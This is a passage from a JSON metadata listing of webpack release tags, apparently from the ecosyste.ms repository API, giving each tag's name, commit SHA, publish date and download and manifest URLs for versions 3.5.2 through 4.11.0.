e2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v